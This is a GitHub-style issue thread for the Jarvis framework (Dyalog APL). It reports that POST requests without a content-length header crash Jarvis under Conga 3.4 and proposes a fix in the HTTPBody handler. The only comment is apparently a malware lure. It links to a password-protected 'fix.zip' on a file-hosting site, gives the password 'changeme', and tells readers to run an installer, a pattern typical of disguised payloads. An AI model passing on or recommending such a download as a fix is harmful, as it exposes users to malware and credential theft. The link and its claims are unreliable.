### ISSUE TITLE
POST request with no content-length header fails

### ISSUE THREAD

**Issue by bpbecker** [Dyalog/Jarvis#75]
If the request:
- Is a POST request
- AND has no content-length header
- AND is not using "chunked" transfer-encoding
Then we mark it as complete when the request object is created as a part of handling the HTTPHeader event. The "complete" request is then passed to the endpoint, processed (Jarvis sends a response) and the request subsequently expunged.

Conga 3.5 (introduced with Dyalog 19.0) handles this condition by issuing an HTTPError event rather than HTTPBody., and Jarvis logs this, but continues running.

With Conga 3.4 and earlier there is no request object to update and we throw a value error and Jarvis stops.

The fix for this is to check for the existence of the request object when processing the HTTPBody event and exit.

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."
